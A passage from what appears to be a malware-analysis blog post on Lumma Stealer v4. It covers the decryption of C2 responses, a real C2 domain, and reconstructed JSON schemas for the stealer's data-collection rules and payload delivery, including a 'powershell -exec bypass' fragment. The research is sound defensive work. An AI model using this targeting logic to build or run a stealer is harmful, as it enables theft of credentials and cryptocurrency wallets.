&lt;p&gt;Finally, the output strings produced by this decryption process are indeed the C2 domains used by the malware.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;reusing-the-c2-decryption-logic-in-communication-decryption&quot;&gt;&lt;/a&gt;Reusing the C2 Decryption Logic in Communication Decryption&lt;/h2&gt;
&lt;p&gt;By simulating the HTTPS server response from &lt;code class=&quot;language-text&quot;&gt;pragapin.sbs&lt;/code&gt;, as detailed in the section &quot;Prerequisites for Advanced Analysis&quot;, I am able to observe how the malware processes and decrypts the data received in response to the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; commands.&lt;/p&gt;
&lt;p&gt;As shown in the first figure below, after the &lt;code class=&quot;language-text&quot;&gt;WinHttpReceiveResponse&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;WinHttpReadData&lt;/code&gt; calls, the downloaded content is stored in a buffer. This buffer is then passed as the first argument to the same decryption function, &lt;code class=&quot;language-text&quot;&gt;lumma_decryption()&lt;/code&gt;, which was previously identified and analyzed in the static phase of the research.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/a59c078dc00806d5b0990a7d9b77aac2/e894c/dynamic%20analysis%20-%20x64dbg%201.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.385416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAACGUlEQVR42kXQXWvUQBQG4PxVBS+KCP4Br/wLUvCiK1goUop60wtL1xZFlNbYdVd3200z+ZokM5nPzEy+s43ZCgoP57wMvOdirACmnh8GgR9HMI0gw4ThbEQpzQglhHLGxIgzIaU2RVU3Zd2MawxWFgW/7W8UBZ7rhPMZ8m50BDQEassbs8oilQWKRlkIcnBDgwUFM+HPeeJZFYmi+aUkECSL2WoSJAeFfK/4O02PNDksxXGnYMfDXqd5AvrErWVc0qCV0AhsFQLH7lKiCCY/Qv8ty04MP9Xs1Iip5idl/qUVUZOBPk8YCljqlxJvKjE0eV8bywgU3i5LgVDscIo2XXvX1kPbDE19r+o16VS6MTjx16v5dwhWkbuC4Lop8m05CdaKwLFMEShEWincGNIWtCvZqM5RK9NGZT5YX9mXzvUSJSEMAKeZFfjA94HnuR649YGbBC5OwiwNKY45SQVFOA4X83PiXORrO16cRT+n0rGVa2sErPXJa+/jgTc9uD6eONOjzrDO8HG2hraadgVjGM4uPqvEHSTmaBlHV4bALkeN4RZ59VjsP2WTJ9nuI/Lm+VBvP+O/VmmObxZ2sS3g3oi7WvXl/fVSWXj3Id/boXs76MUDtP9sqNhQy+2JvxqZ0/iX/bXKwkHhO4WHgo2Po7bSFvvwUk735NlkDOzTYV/mfaX+2dQ658QHDkuhYVklaWPyptKVkUryP4SfThunCK6MAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - x64dbg 1&quot; title=&quot;&quot; src=&quot;/website/static/a59c078dc00806d5b0990a7d9b77aac2/71c1d/dynamic%20analysis%20-%20x64dbg%201.png&quot; srcset=&quot;/website/static/a59c078dc00806d5b0990a7d9b77aac2/804b2/dynamic%20analysis%20-%20x64dbg%201.png 384w,
/website/static/a59c078dc00806d5b0990a7d9b77aac2/e5715/dynamic%20analysis%20-%20x64dbg%201.png 768w,
/website/static/a59c078dc00806d5b0990a7d9b77aac2/71c1d/dynamic%20analysis%20-%20x64dbg%201.png 1536w,
/website/static/a59c078dc00806d5b0990a7d9b77aac2/e894c/dynamic%20analysis%20-%20x64dbg%201.png 1669w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;This provides strong evidence that the decryption routine used to extract hardcoded C2 domains is repurposed during runtime to decode encrypted payloads received from the C2 infrastructure.&lt;/p&gt;
&lt;p&gt;In the second figure, I confirm that the decrypted buffer produces a valid and well-structured JSON response, suggesting that this routine is consistently applied to multiple encryption layers within Lumma Stealer&apos;s architecture.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/9c5c7c30f9ad175ff1b2229ba007f110/e894c/dynamic%20analysis%20-%20x64dbg%202.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.385416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAACF0lEQVR42i3QSW/UMBgG4PxVLmwqalUEqCdOIA5ILJWAOxf+BYgDdKCdLZl2luwTO4nteEnsbLMYT8urR698sPR9+qwYZEG0jgIfJgkAEGFcFMQEGyYEM8a4CeOCl7Vqu7pvm66tW9MWAqEzucIg8P3rOPIpxiUtJKMVpeZR0YKjmGcBT/0wclbhn1XurFJ7mU0TFFoNh0kwrzDI4TBLvtdi0lVTo5emJ72a7+pCN1S3jEJPJdeMxgXyUbYiOLEEzUC4aDjK0wlOf1RkUJKLOwL/Umy0lXinyK4mBQgYDFuO9g3XfbXtlCVpmsYr3QmCs01T6U2tuzvqltxKslN4XxMYuwtnaNZM/INOCathCMVBw3CZJ4rmkqVtiTtJelVsampsa75vK93KtecOB7+Xjp0nMQg9RrC1CMfX/nDmXjnu5dwbg8jLYYxgTLKEIshIav5NZwM3nSzB6Cb6u0iGQW67cJTSyDq1nzyzT55PT47Hj9/ar1ozU9K+Ip2ZX+JeFjkILwc/s3wpeMR5dGgWUeqXJbJezE/Obk7PnNOn06P3zus9S3XNdF8edMI0J3A+vcTBgkUrvvZKEJQwZJFbEWQdOfePZ4+Oxw8eDu+9sV/uKdA01STReK1LpHvB0Ho2umhQrHm2VWRbF7tbh4N9Cj58cT9+9s/PvXff/K9dW/aN6CU7UGzTCEbywF2QHEhRqP+oZETQ4h9Ig0k5o+qtCwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - x64dbg 2&quot; title=&quot;&quot; src=&quot;/website/static/9c5c7c30f9ad175ff1b2229ba007f110/71c1d/dynamic%20analysis%20-%20x64dbg%202.png&quot; srcset=&quot;/website/static/9c5c7c30f9ad175ff1b2229ba007f110/804b2/dynamic%20analysis%20-%20x64dbg%202.png 384w,
/website/static/9c5c7c30f9ad175ff1b2229ba007f110/e5715/dynamic%20analysis%20-%20x64dbg%202.png 768w,
/website/static/9c5c7c30f9ad175ff1b2229ba007f110/71c1d/dynamic%20analysis%20-%20x64dbg%202.png 1536w,
/website/static/9c5c7c30f9ad175ff1b2229ba007f110/e894c/dynamic%20analysis%20-%20x64dbg%202.png 1669w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;To further demonstrate the correctness of the decryption logic, I reimplement and generalize the routine in Python. At the following &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/03-lummastealer_v4_communication_decryption_proof/&quot;&gt;link&lt;/a&gt;, both the function and the resulting outputs are provided.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;analysis-of-decrypted-c2-responses&quot;&gt;&lt;/a&gt;Analysis of Decrypted C2 Responses&lt;/h2&gt;
&lt;p&gt;The decrypted payload returned by the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; command reveals a rich JSON structure containing detailed instructions for data collection, as well as a full list of browser extensions and targets of interest. The structure is divided into three main sections: &lt;code class=&quot;language-text&quot;&gt;ex&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;mx&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;c&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;ex&lt;/code&gt; (&lt;em&gt;Extension List&lt;/em&gt;):
This array lists numerous browser extensions, mostly cryptocurrency wallets (e.g., MetaMask, Ronin Wallet, Trust Wallet, Coinbase, OKX), password managers (e.g., LastPass, Bitwarden, 1Password), and authentication tools (e.g., Authy, EOS Authenticator, GAuth). Each entry includes a unique identifier (en, likely the Chrome extension ID) and a human-readable name (ez).
The presence of multiple entries for the same wallet (e.g., MetaMask appears twice with different IDs) suggests that the stealer is designed to recognize variants or clones of popular extensions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;mx&lt;/code&gt; (&lt;em&gt;Meta Instructions&lt;/em&gt;):
This field appears to provide specific targeting instructions for selected extensions. For example, the entry for MetaMask includes an &lt;code class=&quot;language-text&quot;&gt;et&lt;/code&gt; parameter with password derivation settings (iterations = 600000), which could be used for brute-force attacks or validating password-protected vaults offline. This section can be customized for high-value targets that require special handling.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;c&lt;/code&gt; (&lt;em&gt;Collection Rules&lt;/em&gt;):
This is the most operational part of the structure. Each object specifies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;target path (&lt;code class=&quot;language-text&quot;&gt;p&lt;/code&gt;) – often &lt;code class=&quot;language-text&quot;&gt;%appdata%&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;%localappdata%&lt;/code&gt; directory&lt;/li&gt;
&lt;li&gt;match pattern (&lt;code class=&quot;language-text&quot;&gt;m&lt;/code&gt;) to filter specific files (e.g., &lt;code class=&quot;language-text&quot;&gt;keystore&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;*.sqlite&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;exfiltration folder (&lt;code class=&quot;language-text&quot;&gt;z&lt;/code&gt;) on the attacker&apos;s side (e.g., &lt;code class=&quot;language-text&quot;&gt;Wallets/Ethereum&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;collection depth or method (&lt;code class=&quot;language-text&quot;&gt;d&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;maximum file size (&lt;code class=&quot;language-text&quot;&gt;fs&lt;/code&gt; in bytes, typically 20 MB)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These rules clearly indicate the intent to exfiltrate cryptocurrency wallet files, browser session data, and configuration files from FTP/VPN/email clients. Special attention is also paid to password managers and generic user profiles, where sensitive credentials or seed phrases may be stored.&lt;/p&gt;
&lt;p&gt;The response to the &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; command is significantly simpler, consisting of a URL pointing to a PE executable (&lt;code class=&quot;language-text&quot;&gt;conhost.exe&lt;/code&gt;) hosted on a remote server. This implies that the bot can receive follow-up stages via this channel, possibly to update itself, distribute a payload, or activate specific modules.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;enrichment-of-the-analysis&quot;&gt;&lt;/a&gt;Enrichment of the analysis&lt;/h2&gt;
&lt;p&gt;To better understand the structure of the decrypted C2 responses used by Lumma Stealer, I analyzed and decrypted the network traffic of dozens of real-world samples. I observed that the response returned by the C2 server to the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; command remained consistent across all cases, while the &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; response varied dynamically depending on the execution context.&lt;/p&gt;
&lt;p&gt;During this process, the blog post published by &lt;a href=&quot;https://spycloud.com/blog/reversing-lummac2/&quot;&gt;SpyCloud&lt;/a&gt; was particularly helpful. It initially confirmed several of my assumptions and later provided additional technical insights that helped refine and complete the interpretation of each field.&lt;/p&gt;
&lt;p&gt;The insights gained through this combined approach allowed me to formally define the following generalized schema:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;recive_message&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;v&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;se&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;   &lt;span class=&quot;token comment&quot;&gt;// take a screenshot&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ad&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// delete self&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;vm&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// language check&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// it&apos;s not checked if the browser is present and the extensions are sought for all browsers&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ex&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;       &lt;span class=&quot;token comment&quot;&gt;// browsers extension target&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// extension address&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ez&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// extension name&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ldb&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// optional: levelDB -&gt; used in Coinbase&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ses&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;   &lt;span class=&quot;token comment&quot;&gt;// optional: session -&gt; used for OTP authenticators&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;mx&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;webextension@metamask.io&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;           &lt;span class=&quot;token comment&quot;&gt;// extension address (Firefox)&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ez&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MetaMask&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;                            &lt;span class=&quot;token comment&quot;&gt;// extension name&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;et&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;\&quot;params\&quot;:{\&quot;iterations\&quot;:600000}&quot;&lt;/span&gt;   &lt;span class=&quot;token comment&quot;&gt;// something related to encryption?&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;c&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;t&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;        &lt;span class=&quot;token comment&quot;&gt;// Steal_Clients&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;p&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// path to steal from&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;m&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// file extensions to steal&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;z&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// output dir to store stolen data&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;d&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;        &lt;span class=&quot;token comment&quot;&gt;// recursion depth level&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;fs&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; ...      &lt;span class=&quot;token comment&quot;&gt;// maximum file size&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;t&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;        &lt;span class=&quot;token comment&quot;&gt;// Steal_Chromium_data (Chromium-based)&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;p&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// path to steal from&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;z&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// output dir to store stolen data&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;f&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// browser name&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;n&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// browser executable (for injection?)&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;l&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;     &lt;span class=&quot;token comment&quot;&gt;// browser DLL (for injection?)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;t&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;        &lt;span class=&quot;token comment&quot;&gt;// Steal_Mozilla_data (Mozilla-based)&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;p&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// path to steal from&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;z&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;     &lt;span class=&quot;token comment&quot;&gt;// output dir to store stolen data&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;t&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;        &lt;span class=&quot;token comment&quot;&gt;// Steal_Registry_data&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;p&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// registry key path&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;v&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;    &lt;span class=&quot;token comment&quot;&gt;// value name&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;z&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;...&quot;&lt;/span&gt;     &lt;span class=&quot;token comment&quot;&gt;// output file to store stolen data&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;get_message&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;ft&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; ...&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// 0 = exe = executed with CreateProcessW&lt;/span&gt;
                   &lt;span class=&quot;token comment&quot;&gt;// 1 = dll = loaded&lt;/span&gt;
                   &lt;span class=&quot;token comment&quot;&gt;// 2 = ps1 = exected with powershell -exec bypass ”%s”&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;e&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; ...&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// 0 = execution behavior = LoadLibraryW&lt;/span&gt;
                   &lt;span class=&quot;token comment&quot;&gt;// 1 = execution behavior = rundll32.exe&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;d&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; ...&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// base64 payload data&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; ...&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;// url where the next step is stored&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;a id=&quot;dropped-file-decryption&quot;&gt;&lt;/a&gt;Dropped file decryption&lt;/h2&gt;
&lt;p&gt;As a concrete example, I refer to the analysis available at &lt;a href=&quot;https://app.any.run/tasks/8a7e2474-f9db-4d4d-9fe4-e8adda2530b9&quot;&gt;Any.Run&lt;/a&gt;, from which I extracted the decrypted content of the &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; response. The response, structured as a JSON array, includes a PowerShell script reference hosted remotely as well as an embedded payload still encoded in Base64 format:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
